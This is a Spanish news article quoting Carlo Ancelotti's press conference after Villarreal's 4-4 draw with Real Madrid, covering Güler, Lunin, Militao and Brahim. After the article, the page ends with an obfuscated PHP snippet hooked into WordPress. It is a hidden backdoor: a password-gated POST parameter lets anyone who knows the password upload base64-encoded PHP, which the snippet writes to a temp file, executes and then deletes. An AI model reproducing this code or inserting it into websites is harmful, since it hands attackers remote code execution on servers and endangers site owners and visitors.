“Güler tiene algo especial. Cuanto más cerca de la portería, mejor”

El técnico del Madrid restó peso a los goles encajados: “Ha sido un partido abierto, con poco equilibrio. No cambia nada, la final no tiene por qué ser así”.

GRANADA, SPAIN – MAY 11: Carlo Ancelotti, Head Coach of Real Madrid, looks on prior to the LaLiga EA Sports match between Granada CF and Real Madrid CF at Estadio Nuevo Los Carmenes on May 11, 2024 in Granada, Spain. (Photo by Fran Santiago/Getty Images)

Ancelotti compareció en la sala de prensa del Estadio de La Cerámica para analizar el empate a cuatro entre Villarreal y Real Madrid.

Conclusiones del partido: “Ha sido un partido entretenido, con ritmo, con intensidad, abierto, con poco equilibrio. Lo que sacamos es lo que teníamos que sacar, jugar con intensidad para prepararnos para el último partido de la temporada”.

Goles encajados: “No me preocupa, ha sido un partido muy abierto, con poco equilibrio. Hemos jugado un futbol de ataque, puede ser que hayamos encajado mas de lo necesario. No cambia nada, no tiene que ser así la final. Arriba han jugado muy bien y en ataque Arda Güler ha mostrado algo especial”.

Güler: “Creo que cuanto más cerca de la portería, mejor. Es muy eficaz, marca mucho con poco sitio, tiene un talento especial. Lo muestra mejor mas cerca de la portería”.

Lunin: “Me ha gustado, en los goles no ha podido hacer nada, ha estado bien con los pies. Ha tenido pausa, jugó un partido bueno. Obviamente, los goles no son culpa suya”.

Militao: “Podemos decir que han sufrido los dos centrales. Militao se está acercando al 100%. Tenemos dos semanas, puede llegar a tope a la final”.

El resultado y la remontada: “El objetivo no eran los puntos, no los necesitamos. Era hacer un buen partido, con intensidad, evitar problemas y lesiones. Salió todo perfecto”.

Brahim: “Ha jugado una temporada muy buena, ayudó mucho al equipo, sobre todo es de los que han aportado más de los no habituales. Él, también Joselu que ha marcado muchos goles, Arda también… Su temporada es muy buena, el vestuario está preparado para trabajar bien estas dos semanas e intentar ganar”.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}